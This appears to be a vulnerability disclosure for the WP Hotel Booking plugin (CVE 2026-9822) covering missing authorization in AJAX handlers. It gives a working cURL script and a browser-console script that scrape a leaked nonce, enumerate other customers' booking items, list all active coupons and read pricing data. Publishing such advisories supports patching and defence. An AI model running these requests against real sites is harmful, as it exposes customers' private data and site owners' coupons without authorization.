WP Hotel Booking < 2.3.1 – Subscriber+ Missing Authorization in Multiple AJAX Handlers | CVE 2026-9822

Description

The plugin does not enforce capability checks in several of its AJAX handlers, allowing authenticated users with Subscriber-level access to read other users' booking line items, enumerate active coupons, and read pricing data.

Proof of Concept

## PoC*

The form asks for cURL / raw request / minimal PoC. Paste the following:

````markdown
## Reproduction (cURL)

Prerequisites: a Subscriber account on the target site. Replace `TARGET` and capture the session cookie via standard `wp-login.php` form login. The nonce is scraped from any page because the plugin publicly leaks it via `hotel_settings.nonce`.

```bash
TARGET="https://target.example.com"

# Step 1 — scrape the leaked nonce from any page
NONCE=$(curl -s -b cookie.txt "$TARGET/" \
  | grep -oP "hotel_settings\s*=\s*\{[^}]*nonce:\s*'\K[a-f0-9]+")
echo "Nonce: $NONCE"

# PoC 1 — IDOR: read other customers' booking line items
for id in $(seq 1 10); do
  echo "--- order_item_id=$id ---"
  curl -s -b cookie.txt -X POST \
    "$TARGET/wp-admin/admin-ajax.php" \
    -d "action=hotel_booking_load_order_item&nonce=$NONCE&order_item_id=$id"
  echo
done

# PoC 2 — Coupon enumeration: empty string matches LIKE '%%' → returns ALL active coupons
curl -s -b cookie.txt -X POST \
  "$TARGET/wp-admin/admin-ajax.php" \
  -d "action=hotel_booking_load_coupon_ajax&nonce=$NONCE&coupon="

# PoC 3 — Pricing disclosure: per-day pricing for any room, any month
curl -s -b cookie.txt -X POST \
  "$TARGET/wp-admin/admin-ajax.php" \
  -d "action=hotel_booking_load_other_full_calendar&nonce=$NONCE&room_id=1&date=06%2F15%2F2026"
```

Expected output: JSON booking metadata per existing order item, the full list of currently-redeemable coupon codes, and the daily pricing for the requested room/month.

## Alternative — browser-console PoC (same effect, no cURL required)

Log in as a Subscriber, open any page on the target site, paste this in the browser console, press Enter:

```javascript
(async () => {
    const html = await (await fetch('/', { credentials: 'include' })).text();
    const nonce = html.match(/hotel_settings\s*=\s*\{[\s\S]*?nonce:\s*'([a-f0-9]+)'/)[1];
    const ajax = '/wp-admin/admin-ajax.php';

    // PoC 1: IDOR booking enumeration
    for (let id = 1; id <= 20; id++) {
        const body = new URLSearchParams({ action: 'hotel_booking_load_order_item', nonce, order_item_id: id });
        const j = await (await fetch(ajax, { method: 'POST', body, credentials: 'include' })).json();
        if (j && j.status) console.log(`item ${id}:`, j.room?.post_title, j.check_in_date, '->', j.check_out_date);
    }

    // PoC 2: coupon enumeration
    const coupons = await (await fetch(ajax, {
        method: 'POST',
        body: new URLSearchParams({ action: 'hotel_booking_load_coupon_ajax', nonce, coupon: '' }),
        credentials: 'include'
    })).json();
    console.table(coupons);

    // PoC 3: pricing disclosure
    const pricing = await (await fetch(ajax, {
        method: 'POST',
        body: new URLSearchParams({ action: 'hotel_booking_load_other_full_calendar', nonce, room_id: '1', date: '06/15/2026' }),
        credentials: 'include'
    })).json();
    console.log(pricing);
})();
```
````